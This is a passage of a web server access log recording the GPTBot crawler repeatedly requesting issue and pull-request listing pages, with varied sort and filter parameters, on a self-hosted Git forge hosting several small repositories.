+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 38358] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:19:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:19:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14504] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:19:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=all&type=all" -[17/Feb/2026:19:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=all&type=all" -[17/Feb/2026:19:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:19:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:19:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 